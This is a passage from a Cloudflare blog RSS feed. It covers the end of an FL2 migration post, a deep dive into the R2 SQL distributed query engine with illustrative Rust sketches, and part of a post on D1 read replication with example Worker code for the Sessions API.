    <p>We’re spending the rest of 2025 completing the migration from FL1 to FL2, and will turn off FL1 in early 2026. We’re already seeing the benefits in terms of customer performance and speed of development, and we’re looking forward to giving these to all our customers.</p><p>We have one last service to completely migrate. The “HTTP &amp; TLS Termination” box from the diagram way back at the top is also an NGINX service, and we’re midway through a rewrite in Rust. We’re making good progress on this migration, and expect to complete it early next year.</p><p>After that, when everything is modular, in Rust and tested and scaled, we can really start to optimize! We’ll reorganize and simplify how the modules connect to each other, expand support for non-HTTP traffic like RPC and streams, and much more. </p><p>If you’re interested in being part of this journey, check out our <a href="https://www.cloudflare.com/careers/"><u>careers page</u></a> for open roles - we’re always looking for new talent to help us build a better Internet.</p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[NGINX]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Engineering]]></category>
            <guid isPermaLink="false">7d41Nh5ZiG8DbEjjwhJF3H</guid>
            <dc:creator>Richard Boulton</dc:creator>
            <dc:creator>Steve Goldsmith</dc:creator>
            <dc:creator>Maurizio Abba</dc:creator>
            <dc:creator>Matthew Bullock</dc:creator>
        </item>
        <item>
            <title><![CDATA[R2 SQL: a deep dive into our new distributed query engine]]></title>
            <link>https://blog.cloudflare.com/r2-sql-deep-dive/</link>
            <pubDate>Thu, 25 Sep 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ R2 SQL provides a built-in, serverless way to run ad-hoc analytic queries against your R2 Data Catalog. This post dives deep under the Iceberg into how we built this distributed engine. ]]></description>
            <content:encoded><![CDATA[ <p>How do you run SQL queries over petabytes of data… without a server?</p><p>We have an answer for that: <a href="https://developers.cloudflare.com/r2-sql/"><u>R2 SQL</u></a>, a serverless query engine that can sift through enormous datasets and return results in seconds.</p><p>This post details the architecture and techniques that make this possible. We'll walk through our Query Planner, which uses <a href="https://developers.cloudflare.com/r2/data-catalog/"><u>R2 Data Catalog</u></a> to prune terabytes of data before reading a single byte, and explain how we distribute the work across Cloudflare’s <a href="https://www.cloudflare.com/network"><u>global network</u></a>, <a href="https://developers.cloudflare.com/workers/"><u>Workers</u></a> and <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a> for massively parallel execution.</p>
    <div>
      <h3>From catalog to query</h3>
      <a href="#from-catalog-to-query">
        
      </a>
    </div>
    <p>During Developer Week 2025, we <a href="https://blog.cloudflare.com/r2-data-catalog-public-beta/"><u>launched</u></a> R2 Data Catalog, a managed <a href="https://iceberg.apache.org/"><u>Apache Iceberg</u></a> catalog built directly into your Cloudflare R2 bucket. Iceberg is an open table format that provides critical database features like transactions and schema evolution for petabyte-scale <a href="https://www.cloudflare.com/learning/cloud/what-is-object-storage/">object storage</a>. It gives you a reliable catalog of your data, but it doesn’t provide a way to query it.</p><p>Until now, reading your R2 Data Catalog required setting up a separate service like <a href="https://spark.apache.org/"><u>Apache Spark</u></a> or <a href="https://trino.io/"><u>Trino</u></a>. Operating these engines at scale is not easy: you need to provision clusters, manage resource usage, and be responsible for their availability, none of which contributes to the primary goal of getting value from your data.</p><p><a href="https://developers.cloudflare.com/r2-sql/"><u>R2 SQL</u></a> removes that step entirely. It’s a serverless query engine that executes retrieval SQL queries against your Iceberg tables, right where your data lives.</p>
    <div>
      <h3>Designing a query engine for petabytes</h3>
      <a href="#designing-a-query-engine-for-petabytes">
        
      </a>
    </div>
    <p>Object storage is fundamentally different from a traditional database’s storage. A database is structured by design; R2 is an ocean of objects, where a single logical table can be composed of potentially millions of individual files, large and small, with more arriving every second.</p><p>Apache Iceberg provides a powerful layer of logical organization on top of this reality. It works by managing the table's state as an immutable series of snapshots, creating a reliable, structured view of the table by manipulating lightweight metadata files instead of rewriting the data files themselves.</p><p>However, this logical structure doesn't change the underlying physical challenge: an efficient query engine must still find the specific data it needs within that vast collection of files, and this requires overcoming two major technical hurdles:</p><p><b>The I/O problem</b>: A core challenge for query efficiency is minimizing the amount of data read from storage. A brute-force approach of reading every object is simply not viable. The primary goal is to read only the data that is absolutely necessary.</p><p><b>The Compute problem</b>: The amount of data that does need to be read can still be enormous. We need a way to give the right amount of compute power to a query, which might be massive, for just a few seconds, and then scale it down to zero instantly to avoid waste.</p><p>Our architecture for R2 SQL is designed to solve these two problems with a two-phase approach: a <b>Query Planner</b> that uses metadata to intelligently prune the search space, and a <b>Query Execution</b> system that distributes the work across Cloudflare's global network to process the data in parallel.</p>
    <div>
      <h2>Query Planner</h2>
      <a href="#query-planner">
        
      </a>
    </div>
    <p>The most efficient way to process data is to avoid reading it in the first place. This is the core strategy of the R2 SQL Query Planner. Instead of exhaustively scanning every file, the planner makes use of the metadata structure provided by R2 Data Catalog to prune the search space, that is, to avoid reading huge swathes of data irrelevant to a query.</p><p>This is a top-down investigation where the planner navigates the hierarchy of Iceberg metadata layers, using <b>stats</b> at each level to build a fast plan, specifying exactly which byte ranges the query engine needs to read.</p>
    <div>
      <h3>What do we mean by “stats”?</h3>
      <a href="#what-do-we-mean-by-stats">
        
      </a>
    </div>
    <p>When we say the planner uses "stats", we are referring to summary metadata that Iceberg stores about the contents of the data files. These statistics create a coarse map of the data, allowing the planner to make decisions about which files to read, and which to ignore, without opening them.</p><p>There are two primary levels of statistics the planner uses for pruning:</p><p><b>Partition-level stats</b>: Stored in the Iceberg manifest list, these stats describe the range of partition values for all the data in a given Iceberg manifest file. For a partition on <code>day(event_timestamp)</code>, this would be the earliest and latest day present in the files tracked by that manifest.</p><p><b>Column-level stats</b>: Stored in the manifest files, these are more granular stats about each individual data file. Data files in R2 Data Catalog are formatted using the <a href="https://parquet.apache.org/"><u>Apache Parquet</u></a> format. For every column of a Parquet file, the manifest stores key information like:</p><ul><li><p>The minimum and maximum values. If a query asks for <code>http_status = 500</code>, and a file’s stats show its <code>http_status</code> column has a min of 200 and a max of 404, that entire file can be skipped.</p></li><li><p>A count of null values. This allows the planner to skip files when a query specifically looks for non-null values (e.g., <code>WHERE error_code IS NOT NULL</code>) and the file's metadata reports that all values for <code>error_code</code> are null.</p></li></ul><p>Now, let's see how the planner uses these stats as it walks through the metadata layers.</p>
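<p>The pruning checks themselves are simple interval and null-count tests. Here is a small illustrative sketch (the <code>ColumnStats</code> type and function names are our own, not Iceberg’s):</p>

```rust
// Illustrative sketch of column-stat pruning; these types are not the
// actual Iceberg or R2 SQL structures.
struct ColumnStats {
    min: i64,
    max: i64,
    null_count: u64,
    row_count: u64,
}

/// Can a file possibly contain rows where `column = value`?
fn may_contain_equality(stats: &ColumnStats, value: i64) -> bool {
    stats.min <= value && value <= stats.max
}

/// Can a file possibly contain non-null values for this column?
fn may_contain_non_null(stats: &ColumnStats) -> bool {
    stats.null_count < stats.row_count
}

fn main() {
    // The example above: http_status min=200, max=404, query asks for 500.
    let http_status = ColumnStats { min: 200, max: 404, null_count: 0, row_count: 10_000 };
    assert!(!may_contain_equality(&http_status, 500)); // file skipped
    assert!(may_contain_equality(&http_status, 301));  // file must be read

    // A file whose error_code column is entirely null is skipped for IS NOT NULL.
    let error_code = ColumnStats { min: 0, max: 0, null_count: 10_000, row_count: 10_000 };
    assert!(!may_contain_non_null(&error_code));
    println!("pruning checks passed");
}
```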
    <div>
      <h3>Pruning the search space</h3>
      <a href="#pruning-the-search-space">
        
      </a>
    </div>
    <p>The pruning process is a top-down investigation that happens in four main steps:</p><ol><li><p><b>Table metadata and the current snapshot</b></p><p>The planner begins by asking the catalog for the location of the current table metadata. This is a JSON file containing the table's current schema, partition specs, and a log of all historical snapshots. The planner then fetches the latest snapshot to work with.</p></li><li><p><b>Manifest list and partition pruning</b></p><p>The current snapshot points to a single Iceberg manifest list. The planner reads this file and uses the partition-level stats for each entry to perform the first, most powerful pruning step, discarding any manifests whose partition value ranges don't satisfy the query. For a table partitioned by <code>day(event_timestamp)</code>, the planner can use the min/max values in the manifest list to immediately discard any manifests that don't contain data for the days relevant to the query.</p></li><li><p><b>Manifests and file-level pruning</b></p><p>For the remaining manifests, the planner reads each one to get a list of the actual Parquet data files. These manifest files contain more granular, column-level stats for each individual data file they track. This allows for a second pruning step, discarding entire data files that cannot possibly contain rows matching the query's filters.</p></li><li><p><b>File row-group pruning</b></p><p>Finally, for the specific data files that are still candidates, the Query Planner uses statistics stored inside each Parquet file's footer to skip over entire row groups.</p></li></ol><p>The result of this multi-layer pruning is a precise list of Parquet files, and of row groups within those Parquet files. These become the query work units that are dispatched to the Query Execution system for processing.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7GKvgbex2vhIBqQ1G5UFjQ/2a99db7ae786b8e22a326bac0c9037d9/1.png" />
          </figure>
    <div>
      <h3>The Planning pipeline</h3>
      <a href="#the-planning-pipeline">
        
      </a>
    </div>
    <p>In R2 SQL, the multi-layer pruning we've described so far isn't a monolithic process. For a table with millions of files, the metadata can be too large to process before starting any real work. Waiting for a complete plan would introduce significant latency.</p><p>Instead, R2 SQL treats planning and execution together as a concurrent pipeline. The planner's job is to produce a stream of work units for the executor to consume as soon as they are available.</p><p>The planner’s investigation begins with two fetches to get a map of the table's structure: one for the table’s snapshot and another for the manifest list.</p>
    <div>
      <h4>Starting execution as early as possible</h4>
      <a href="#starting-execution-as-early-as-possible">
        
      </a>
    </div>
    <p>From that point on, the query is processed in a streaming fashion. As the Query Planner reads through the manifest files, and then the data files they point to, it prunes as it goes and immediately emits any surviving data files and row groups as work units to the execution queue.</p><p>This pipeline structure ensures the compute nodes can begin the expensive work of data I/O almost instantly, long before the planner has finished its full investigation.</p><p>On top of this pipeline model, the planner adds a crucial optimization: <b>deliberate ordering</b>. The manifest files are not streamed in an arbitrary sequence. Instead, the planner processes them in an order matching the query's <code>ORDER BY</code> clause, guided by the metadata stats. This ensures that the data most likely to contain the desired results is processed first.</p><p>These two concepts work together to address query latency from both ends of the query pipeline.</p><p>The streamed planning pipeline lets us start crunching data as soon as possible, minimizing the delay before the first byte is processed. At the other end of the pipeline, the deliberate ordering of that work lets us finish early by finding a definitive result without scanning the entire dataset.</p><p>The next section explains the mechanics behind this "finish early" strategy.</p>
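<p>The planner/executor pipeline can be sketched as a classic producer/consumer pair. In this toy model the work units are just integers; real units carry file paths and row-group byte ranges. The executor starts consuming as soon as the planner emits its first unit:</p>

```rust
use std::sync::mpsc;
use std::thread;

// Toy model of the planning pipeline: a "planner" thread streams work units
// into a channel as it prunes, while the "executor" consumes concurrently.
fn run_pipeline() -> Vec<u32> {
    let (tx, rx) = mpsc::channel::<u32>();

    let planner = thread::spawn(move || {
        for manifest in 0..3u32 {
            // Pretend pruning leaves two surviving row groups per manifest.
            for row_group in 0..2u32 {
                tx.send(manifest * 10 + row_group).unwrap();
            }
        }
        // Dropping `tx` closes the channel, which ends the executor's loop.
    });

    // The executor starts on the first unit long before planning finishes.
    let mut processed = Vec::new();
    for unit in rx {
        processed.push(unit);
    }
    planner.join().unwrap();
    processed
}

fn main() {
    let processed = run_pipeline();
    assert_eq!(processed, vec![0, 1, 10, 11, 20, 21]);
    println!("processed {} work units", processed.len());
}
```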
    <div>
      <h4>Stopping early: how to finish without reading everything</h4>
      <a href="#stopping-early-how-to-finish-without-reading-everything">
        
      </a>
    </div>
    <p>Thanks to the Query Planner streaming work units in an order matching the <code>ORDER BY</code> clause, the Query Execution system first processes the data that is most likely to be in the final result set.</p><p>This prioritization happens at two levels of the metadata hierarchy:</p><p><b>Manifest ordering</b>: The planner first inspects the manifest list. Using the partition stats for each manifest (e.g., the latest timestamp in that group of files), it decides which entire manifest files to stream first.</p><p><b>Parquet file ordering</b>: As it reads each manifest, it then uses the more granular column-level stats to decide the processing order of the individual Parquet files within that manifest.</p><p>This ensures a constantly prioritized stream of work units is sent to the execution engine, and this prioritized stream is what allows us to stop the query early.</p><p>For instance, with a query like ... <code>ORDER BY timestamp DESC LIMIT 5</code>, as the execution engine processes work units and sends back results, the planner does two things concurrently:</p><ul><li><p>It maintains a bounded heap of the best 5 results seen so far, constantly comparing new results to the oldest timestamp in the heap.</p></li><li><p>It keeps a "high-water mark" on the stream itself. Thanks to the metadata, it always knows the absolute latest timestamp of any data file that has not yet been processed.</p></li></ul><p>The planner constantly compares the state of the heap to the high-water mark of the remaining stream. The moment the oldest timestamp in our top 5 heap is newer than the high-water mark of the remaining stream, the entire query can be stopped.</p><p>At that point, we can prove that no remaining work unit could possibly contain a result that would make it into the top 5. The pipeline is halted, and a complete, correct result is returned to the user, often after reading only a fraction of the potentially matching data.</p><p>Currently, R2 SQL supports ordering only on columns that are part of the table's partition key. This is a limitation we are working on lifting in the future.</p>
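<p>The bounded heap plus high-water-mark check can be sketched in a few lines. This is an illustrative model, not R2 SQL’s actual code: work units arrive newest-first, each tagged with the latest timestamp its metadata says it could contain, and we stop the moment the remaining stream can no longer beat the heap:</p>

```rust
use std::cmp::Reverse;
use std::collections::BinaryHeap;

// Illustrative model of the "finish early" check for ORDER BY ts DESC LIMIT k.
// A work unit is (high_water_mark_from_metadata, row_timestamps).
fn top_k_timestamps(work_units: &[(i64, Vec<i64>)], k: usize) -> (Vec<i64>, usize) {
    // Min-heap of the k newest timestamps seen so far.
    let mut heap: BinaryHeap<Reverse<i64>> = BinaryHeap::new();
    let mut units_read = 0;

    // Work units arrive ordered by their metadata high-water mark, newest first.
    for &(high_water_mark, ref rows) in work_units {
        // Early stop: even the newest possible row in the remaining stream is
        // older than the oldest entry already in our top-k heap.
        if heap.len() == k
            && heap.peek().map_or(false, |&Reverse(oldest)| oldest > high_water_mark)
        {
            break;
        }
        units_read += 1;
        for &ts in rows {
            if heap.len() < k {
                heap.push(Reverse(ts));
            } else if heap.peek().map_or(false, |&Reverse(oldest)| ts > oldest) {
                heap.pop();
                heap.push(Reverse(ts));
            }
        }
    }

    // Drain the heap into newest-first order.
    let mut result: Vec<i64> = heap.into_iter().map(|Reverse(ts)| ts).collect();
    result.sort_unstable_by(|a, b| b.cmp(a));
    (result, units_read)
}

fn main() {
    // Three work units, streamed newest-first; the third can never beat the top 5.
    let units = vec![
        (100, vec![100, 98, 97]),
        (96, vec![96, 95, 40]),
        (30, vec![30, 29, 28]), // high-water mark 30 < oldest of top 5 (95)
    ];
    let (top, read) = top_k_timestamps(&units, 5);
    assert_eq!(top, vec![100, 98, 97, 96, 95]);
    assert_eq!(read, 2); // the last unit was never read
    println!("top 5 = {:?}, units read = {}", top, read);
}
```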
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5qN9TeEuRZJIidYXFictG/8a55cc6088be3abdc3b27878daa76e40/image4.png" />
          </figure>
    <div>
      <h3>Architecture</h3>
      <a href="#architecture">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3wkvnT24y5E0k5064cqu0T/939402d16583647986eec87617379900/image3.png" />
          </figure>
    <div>
      <h2>Query Execution</h2>
      <a href="#query-execution">
        
      </a>
    </div>
    <p>The Query Planner streams the query work in bite-sized pieces called row groups. A single Parquet file usually contains multiple row groups, but most of the time only a few of them contain relevant data. Splitting query work into row groups allows R2 SQL to read only small parts of potentially multi-GB Parquet files.</p><p>The server that receives the user’s request and performs query planning assumes the role of query coordinator. It distributes the work across query workers and aggregates results before returning them to the user.</p><p>Cloudflare’s network is vast, and many servers can be under maintenance at the same time. The query coordinator contacts Cloudflare’s internal API to make sure only healthy, fully functioning servers are picked for query execution. Connections between the coordinator and query workers go through <a href="https://www.cloudflare.com/en-gb/application-services/products/argo-smart-routing/"><u>Cloudflare Argo Smart Routing</u></a> to ensure fast, reliable connectivity.</p><p>Servers that receive query execution requests from the coordinator assume the role of query workers. Query workers serve as a point of horizontal scalability in R2 SQL. With a higher number of query workers, R2 SQL can process queries faster by distributing the work among many servers. That’s especially true for queries covering large numbers of files.</p><p>Both the coordinator and query workers run on Cloudflare’s distributed network, ensuring R2 SQL has plenty of compute power and I/O throughput to handle analytical workloads.</p><p>Each query worker receives a batch of row groups from the coordinator, as well as an SQL query to run on it. Additionally, the coordinator sends serialized metadata about the Parquet files containing the row groups. Thanks to that, query workers know the exact byte offsets where each row group is located in the Parquet file, without needing to read this information from R2.</p>
    <div>
      <h3>Apache DataFusion</h3>
      <a href="#apache-datafusion">
        
      </a>
    </div>
    <p>Internally, each query worker uses <a href="https://github.com/apache/datafusion"><u>Apache DataFusion</u></a> to run SQL queries against row groups. DataFusion is an open-source analytical query engine written in Rust. It is built around the concept of partitions. A query is split into multiple concurrent independent streams, each working on its own partition of data.</p><p>Partitions in DataFusion are similar to partitions in Iceberg, but serve a different purpose. In Iceberg, partitions are a way to physically organize data on object storage. In DataFusion, partitions organize in-memory data for query processing. While logically they are similar – rows grouped together based on some logic – in practice, a partition in Iceberg doesn’t always correspond to a partition in DataFusion.</p><p>DataFusion partitions map perfectly to the R2 SQL query worker’s data model because each row group can be considered its own independent partition. Thanks to that, each row group is processed in parallel.</p><p>At the same time, since row groups usually contain at least 1000 rows, R2 SQL benefits from vectorized execution. Each DataFusion partition stream can execute the SQL query on multiple rows in one go, amortizing the overhead of query interpretation.</p><p>There are two ends of the spectrum when it comes to query execution: processing all rows sequentially in one big batch, and processing each individual row in parallel. Sequential processing creates a so-called “tight loop”, which is usually more CPU-cache friendly. In addition, we can significantly reduce interpretation overhead, as processing rows in large batches means that we go through the query plan less often. Fully parallel processing gives up these benefits, but makes use of multiple CPU cores to finish the query faster.</p><p>DataFusion’s architecture lets us strike a balance between these two extremes, reaping benefits from both ends. For each data partition, we gain better CPU cache locality and amortized interpretation overhead. At the same time, since many partitions are processed in parallel, we distribute the workload across multiple CPU cores, cutting the execution time further.</p>
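<p>As a toy model of this execution style (plain threads standing in for DataFusion’s partition streams; the data and filter are made up), each row group is scanned in a tight loop while the groups themselves run in parallel:</p>

```rust
use std::thread;

// Toy model (plain threads, not DataFusion): each row group is its own
// partition, scanned in a tight loop, with groups processed in parallel.
fn count_matching(row_group: &[i64], predicate: fn(i64) -> bool) -> usize {
    // The per-batch tight loop that benefits from cache locality and
    // amortized interpretation overhead.
    row_group.iter().filter(|&&v| predicate(v)).count()
}

fn parallel_count(row_groups: Vec<Vec<i64>>, predicate: fn(i64) -> bool) -> usize {
    // One thread per row group, then merge the partial counts.
    let handles: Vec<_> = row_groups
        .into_iter()
        .map(|rg| thread::spawn(move || count_matching(&rg, predicate)))
        .collect();
    handles.into_iter().map(|h| h.join().unwrap()).sum()
}

fn main() {
    let row_groups: Vec<Vec<i64>> = vec![
        (0..1000).collect(),
        (1000..2000).collect(),
        (2000..3000).collect(),
    ];
    let total = parallel_count(row_groups, |v| v % 2 == 0);
    assert_eq!(total, 1500);
    println!("matched {total} rows across 3 parallel partitions");
}
```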
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Tis1F5C1x3x6sIyJLL8ju/aae094818b1b7f6f8d6f857305948fbd/image1.png" />
          </figure><p>In addition to the smart query execution model, DataFusion also provides first-class Parquet support.</p><p>As a file format, Parquet has multiple optimizations designed specifically for query engines. Parquet is a column-based format, meaning that each column is physically separated from the others. This separation enables better compression ratios, but it also allows the query engine to read columns selectively. If the query only uses five columns, we can read just those and skip the remaining fifty. This massively reduces the amount of data we need to read from R2 and the CPU time spent on decompression.</p><p>DataFusion does exactly that. Using R2 ranged reads, it reads only the parts of the Parquet files containing the requested columns, skipping the rest.</p><p>DataFusion’s optimizer also allows us to push filters down to the lowest levels of the query plan. In other words, we can apply filters right as we are reading values from Parquet files. This lets us skip materializing results we know for sure won’t be returned to the user, cutting the query execution time further.</p>
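<p>Selective column reads boil down to computing which byte ranges to fetch. A simplified sketch follows; the footer layout here is invented, and real Parquet metadata is much richer:</p>

```rust
use std::collections::HashMap;

// Simplified sketch of selective column reads: given (invented) per-column
// byte ranges from a file footer, compute only the ranges a query needs.
fn ranges_to_read(
    column_chunks: &HashMap<&str, (u64, u64)>, // column name -> (offset, length)
    selected: &[&str],
) -> Vec<(u64, u64)> {
    let mut ranges: Vec<(u64, u64)> = selected
        .iter()
        .filter_map(|col| column_chunks.get(col).copied())
        .collect();
    ranges.sort_unstable(); // issue reads in file order
    ranges
}

fn main() {
    let mut chunks = HashMap::new();
    chunks.insert("timestamp", (0u64, 1_000u64));
    chunks.insert("http_status", (1_000, 200));
    chunks.insert("user_agent", (1_200, 50_000)); // large column the query skips
    let ranges = ranges_to_read(&chunks, &["timestamp", "http_status"]);
    assert_eq!(ranges, vec![(0, 1_000), (1_000, 200)]);
    println!("fetching {} of {} column chunks", ranges.len(), chunks.len());
}
```

<p>Each returned range would become one ranged read against R2, leaving the unselected columns untouched on object storage.</p>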
    <div>
      <h3>Returning query results</h3>
      <a href="#returning-query-results">
        
      </a>
    </div>
    <p>Once the query worker finishes computing results, it returns them to the coordinator through <a href="https://grpc.io/"><u>the gRPC protocol</u></a>.</p><p>R2 SQL uses <a href="https://arrow.apache.org/"><u>Apache Arrow</u></a> for internal representation of query results. Arrow is an in-memory format that efficiently represents arrays of structured data. It is also used by DataFusion during query execution to represent partitions of data.</p><p>In addition to being an in-memory format, Arrow also defines the <a href="https://arrow.apache.org/docs/format/Columnar.html#format-ipc"><u>Arrow IPC</u></a> serialization format. Arrow IPC isn’t designed for long-term storage of the data, but for inter-process communication, which is exactly what query workers and the coordinator do over the network. The query worker serializes all the results into the Arrow IPC format and embeds them into the gRPC response. The coordinator in turn deserializes results and can return to working on Arrow arrays.</p>
    <div>
      <h2>Future plans</h2>
      <a href="#future-plans">
        
      </a>
    </div>
    <p>While R2 SQL is currently quite good at executing filter queries, we also plan to rapidly add new capabilities over the coming months. This includes, but is not limited to, adding:</p><ul><li><p>Support for complex aggregations in a distributed and scalable fashion;</p></li><li><p>Tools that provide visibility into query execution, helping developers improve performance;</p></li><li><p>Support for many of the configuration options Apache Iceberg supports.</p></li></ul><p>In addition to that, we plan to improve our developer experience by allowing users to query their R2 Data Catalogs using R2 SQL from the Cloudflare Dashboard.</p><p>Given Cloudflare’s distributed compute, network capabilities, and ecosystem of developer tools, we have the opportunity to build something truly unique here. We are exploring different kinds of indexes to make R2 SQL queries even faster and to provide more functionality such as full-text search, geospatial queries, and more. </p>
    <div>
      <h2>Try it now!</h2>
      <a href="#try-it-now">
        
      </a>
    </div>
    <p>It’s early days for R2 SQL, but we’re excited for users to get their hands on it. R2 SQL is available in open beta today! Head over to our<a href="https://developers.cloudflare.com/r2-sql/get-started/"> <u>getting started guide</u></a> to learn how to create an end-to-end data pipeline that processes and delivers events to an R2 Data Catalog table, which can then be queried with R2 SQL.</p><p>
We’re excited to see what you build! Come share your feedback with us on our<a href="http://discord.cloudflare.com/"> <u>Developer Discord</u></a>.</p><div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[R2]]></category>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Data]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Edge Computing]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[SQL]]></category>
            <guid isPermaLink="false">7znvjodLkg1AxYlR992it2</guid>
            <dc:creator>Yevgen Safronov</dc:creator>
            <dc:creator>Nikita Lapkov</dc:creator>
            <dc:creator>Jérôme Schneider</dc:creator>
        </item>
        <item>
            <title><![CDATA[Sequential consistency without borders: how D1 implements global read replication]]></title>
            <link>https://blog.cloudflare.com/d1-read-replication-beta/</link>
            <pubDate>Thu, 10 Apr 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ D1, Cloudflare’s managed SQL database, announces read replication beta. Here's a deep dive of the read replication implementation and how your queries can remain consistent across all regions. ]]></description>
            <content:encoded><![CDATA[ <p>Read replication of <a href="https://www.cloudflare.com/developer-platform/products/d1/">D1 databases</a> is in public beta!</p><p>D1 read replication makes read-only copies of your database available in multiple regions across Cloudflare’s network.  For busy, read-heavy applications like e-commerce websites, content management tools, and mobile apps:</p><ul><li><p>D1 read replication lowers average latency by routing user requests to read replicas in nearby regions.</p></li><li><p>D1 read replication increases overall throughput by offloading read queries to read replicas, allowing the primary database to handle more write queries.</p></li></ul><p>The main copy of your database is called the primary database and the read-only copies are called read replicas.  When you enable replication for a D1 database, the D1 service automatically creates and maintains read replicas of your primary database.  As your users make requests, D1 routes those requests to an appropriate copy of the database (either the primary or a replica) based on performance heuristics, the type of queries made in those requests, and the query consistency needs as expressed by your application.</p><p>All of this global replica creation and request routing is handled by Cloudflare at no additional cost.</p><p>To take advantage of read replication, your Worker needs to use the new D1 <a href="https://developers.cloudflare.com/d1/best-practices/read-replication/"><u>Sessions API</u></a>. Click the button below to run a Worker using D1 read replication with this <a href="https://github.com/cloudflare/templates/tree/main/d1-starter-sessions-api-template"><u>code example</u></a> to see for yourself!</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/templates/tree/main/d1-starter-sessions-api-template"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p>
    <div>
      <h2>D1 Sessions API</h2>
      <a href="#d1-sessions-api">
        
      </a>
    </div>
    <p>D1’s read replication feature is built around the concept of database <i>sessions</i>.  A session encapsulates all the queries representing one logical session for your application. For example, a session might represent all requests coming from a particular web browser or all requests coming from a mobile app used by one of your users. If you use sessions, your queries will use the appropriate copy of the D1 database that makes the most sense for your request, be that the primary database or a nearby replica.</p><p>The sessions implementation ensures <a href="https://jepsen.io/consistency/models/sequential"><u>sequential consistency</u></a> for all queries in the session, no matter what copy of the database each query is routed to.  The sequential consistency model has important properties like "<a href="https://jepsen.io/consistency/models/read-your-writes"><u>read my own writes</u></a>" and "<a href="https://jepsen.io/consistency/models/writes-follow-reads"><u>writes follow reads</u></a>," as well as a total ordering of writes. The total ordering of writes means that every replica will see transactions committed in the same order, which is exactly the behavior we want in a transactional system.  Said another way, sequential consistency guarantees that the reads and writes are executed in the order in which you write them in your code.</p><p>Some examples of consistency implications in real-world applications:</p><ul><li><p>You are using an online store and just placed an order (write query), followed by a visit to the account page to list all your orders (read query handled by a replica). 
You want the newly placed order to be listed there as well.</p></li><li><p>You are using your bank’s web application and make a transfer to your electricity provider (write query), and then immediately navigate to the account balance page (read query handled by a replica) to check the latest balance of your account, including that last payment.</p></li></ul><p>Why do we need the Sessions API? Why can we not just query replicas directly?</p><p>Applications using D1 read replication need the Sessions API because D1 runs on Cloudflare’s global network and there’s no way to ensure that requests from the same client get routed to the same replica for every request. For example, the client may switch from WiFi to a mobile network in a way that changes how their requests are routed to Cloudflare. Or the data center that handled previous requests could be down because of an outage or maintenance.</p><p>D1’s read replication is asynchronous, so it’s possible that when you switch between replicas, the replica you switch to lags behind the replica you were using. This could mean that, for example, the new replica hasn’t learned of the writes you just completed.  We could no longer guarantee useful properties like “read your own writes”.  In fact, in the presence of shifty routing, the only consistency property we could guarantee is that what you read had been committed at some point in the past (<a href="https://jepsen.io/consistency/models/read-committed"><u>read committed</u></a> consistency), which isn’t very useful at all!</p><p>Since we can’t guarantee routing to the same replica, we flip the script and use the information we get from the Sessions API to make sure whatever replica we land on can handle the request in a sequentially-consistent manner.</p><p>Here’s what the Sessions API looks like in a Worker:</p>
            <pre><code>export default {
  async fetch(request: Request, env: Env) {
    // A. Create the session.
    // When we create a D1 session, we can continue where we left off from a previous    
    // session if we have that session's last bookmark or use a constraint.
    const bookmark = request.headers.get('x-d1-bookmark') ?? 'first-unconstrained'
    const session = env.DB.withSession(bookmark)

    // Use this session for all our Workers' routes.
    const response = await handleRequest(request, session)

    // B. Return the bookmark so we can continue the session in another request.
    response.headers.set('x-d1-bookmark', session.getBookmark())

    return response
  }
}

async function handleRequest(request: Request, session: D1DatabaseSession) {
  const { pathname } = new URL(request.url)

  if (request.method === "GET" &amp;&amp; pathname === '/api/orders') {
    // C. Session read query.
    const { results } = await session.prepare('SELECT * FROM Orders').all()
    return Response.json(results)

  } else if (request.method === "POST" &amp;&amp; pathname === '/api/orders') {
    const order = await request.json&lt;Order&gt;()

    // D. Session write query.
    // Since this is a write query, D1 will transparently forward it to the primary.
    await session
      .prepare('INSERT INTO Orders VALUES (?, ?, ?)')
      .bind(order.orderId, order.customerId, order.quantity)
      .run()

    // E. Session read-after-write query.
    // In order for the application to be correct, this SELECT statement must see
    // the results of the INSERT statement above.
    const { results } = await session
      .prepare('SELECT * FROM Orders')
      .all()

    return Response.json(results)
  }

  return new Response('Not found', { status: 404 })
}</code></pre>
            <p>To use the Sessions API, you first need to create a session using the <code>withSession</code> method (<b><i>step A</i></b>).  The <code>withSession</code> method takes either a bookmark or a constraint as its parameter.  The provided constraint instructs D1 where to forward the first query of the session. Using <code>first-unconstrained</code> allows the first query to be processed by any replica without any restriction on how up-to-date it is. Using <code>first-primary</code> ensures that the first query of the session will be forwarded to the primary.</p>
            <pre><code>// A. Create the session.
const bookmark = request.headers.get('x-d1-bookmark') ?? 'first-unconstrained'
const session = env.DB.withSession(bookmark)</code></pre>
            <p>Providing an explicit bookmark instructs D1 that whichever database instance processes the query has to be at least as up-to-date as the provided bookmark (in case of a replica; the primary database is always up-to-date by definition).  Explicit bookmarks are how we can continue from previously-created sessions and maintain sequential consistency across user requests.</p><p>Once you’ve created the session, make queries like you normally would with D1.  The session object ensures that the queries you make are sequentially consistent with regards to each other.</p>
            <pre><code>// C. Session read query.
const { results } = await session.prepare('SELECT * FROM Orders').all()</code></pre>
            <p>For example, in the code example above, the session read query for listing the orders (<b><i>step C</i></b>) will return results that are at least as up-to-date as the bookmark used to create the session (<b><i>step A</i></b><i>)</i>.</p><p>More interesting is the write query to add a new order (<b><i>step D</i></b>) followed by the read query to list all orders (<b><i>step E</i></b>). Because both queries are executed on the same session, it is guaranteed that the read query will observe a database copy that includes the write query, thus maintaining sequential consistency.</p>
            <pre><code>// D. Session write query.
await session
